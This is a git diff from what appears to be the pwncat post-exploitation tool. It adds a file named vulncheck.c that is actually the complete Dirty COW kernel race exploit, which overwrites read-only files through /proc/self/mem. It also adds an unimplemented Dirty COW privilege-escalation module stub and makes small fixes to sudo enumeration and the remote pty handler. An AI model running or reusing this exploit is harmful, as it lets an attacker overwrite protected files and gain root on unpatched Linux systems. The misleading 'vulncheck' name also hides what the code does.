diff --git a/data/dirtycow/vulncheck.c b/data/dirtycow/vulncheck.c new file mode 100644 index 0000000..2aca9d5 --- /dev/null +++ b/data/dirtycow/vulncheck.c @@ -0,0 +1,9 @@ +#include +#include +#include +#include +#include +#include +#include +#include +void*map;int f;struct stat st;char*name;void*madviseThread(void*arg){char*str;str=(char*)arg;int i,c=0;for(i=0;i<100000000;i++){c+=madvise(map,100,MADV_DONTNEED);}printf("madvise%d\n\n",c);}void*procselfmemThread(void*arg){char*str;str=(char*)arg;int f=open("/proc/self/mem",O_RDWR);int i,c=0;for(i=0;i<100000000;i++){lseek(f,(uintptr_t)map,SEEK_SET);c+=write(f,str,strlen(str));}printf("procselfmem%d\n\n",c);}int main(int argc,char*argv[]){if(argc<3){(void)fprintf(stderr,"%s\n","usage: dirtyc0w target_file new_content");return 1;}pthread_t pth1,pth2;f=open(argv[1],O_RDONLY);fstat(f,&st);name=argv[1];map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);printf("mmap%zx\n\n",(uintptr_t)map);pthread_create(&pth1,NULL,madviseThread,argv[1]);pthread_create(&pth2,NULL,procselfmemThread,argv[2]);pthread_join(pth1,NULL);pthread_join(pth2,NULL);return 0;} \ No newline at end of file diff --git a/pwncat/privesc/dirtycow.py b/pwncat/privesc/dirtycow.py new file mode 100644 index 0000000..00600c1 --- /dev/null +++ b/pwncat/privesc/dirtycow.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python3 + +from typing import Generator, List +import shlex +import sys +from time import sleep +import os +from colorama import Fore, Style +import socket +from io import StringIO, BytesIO +import functools + +from pwncat.util import CTRL_C +from pwncat.privesc.base import Method, PrivescError, Technique +from pwncat.file import RemoteBinaryPipe + +from pwncat.pysudoers import Sudoers +from pwncat import gtfobins +from pwncat.privesc import Capability +from pwncat import util + + +class DirtycowMethod(Method): + + name = "dirtycow" + BINARIES = ["gcc"] + + def __init__(self, pty: "pwncat.pty.PtyHandler"): + super(DirtycowMethod, self).__init__(pty) + + def enumerate(self, capability: int = Capability.ALL) -> List[Technique]: + """ Find all techniques known at this time """ + + # Test if this kernel version is vulnerable to dirtycow + + return NotImplemented("this function is not yet written") + + def execute(self, technique: Technique): + """ Run the specified technique """ + + # actually perform dirtycow + + return NotImplemented("this function is not yet written") diff --git a/pwncat/privesc/sudo.py b/pwncat/privesc/sudo.py index 0a4eeef..6fd8fb9 100644 --- a/pwncat/privesc/sudo.py +++ b/pwncat/privesc/sudo.py @@ -138,14 +138,6 @@ class SudoMethod(Method): tag = " ".join(tags_split[1:]) command = commands["command"] - # success( - # f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} can run " - # + f"{Fore.YELLOW}{command}{Fore.RESET} " - # + f"as user {Fore.BLUE}{run_as_user}{Fore.RESET} " - # + f"with {Fore.BLUE}{tag}{Fore.RESET}", - # overlay=True, - # ) - if "NOPASSWD" in tag: sudo_no_password.append( { @@ -181,9 +173,7 @@ class SudoMethod(Method): # The PtyHandler.which method is used to verify the presence of # different GTFObins on the remote system when an "ALL" spec is # found. - # sudo_privesc["command"], binary = gtfobins.Binary.find_sudo( - # sudo_privesc["command"], self.pty.which - # ) + binaries = gtfobins.Binary.find_sudo( sudo_privesc["command"], self.pty.which, capability ) diff --git a/pwncat/pty.py b/pwncat/pty.py index b0c679e..d5e450e 100644 --- a/pwncat/pty.py +++ b/pwncat/pty.py @@ -791,7 +791,6 @@ class PtyHandler: """ Reset the remote terminal (calls sync, reset, and sets PS1) """ self.reset() self.do_sync([]) - print(self.id()) def run(self, cmd, wait=True, input: bytes = b"") -> bytes: """ Run a command in the context of the remote host and return the @@ -985,9 +984,9 @@ class PtyHandler: @property def id(self): - id_output = self.run("id") + id_output = self.run("id").decode("utf-8") - pieces = id_output.split(" ").decode("utf-8") + pieces = id_output.split(" ") props = {} for p in pieces: segments = p.split("=")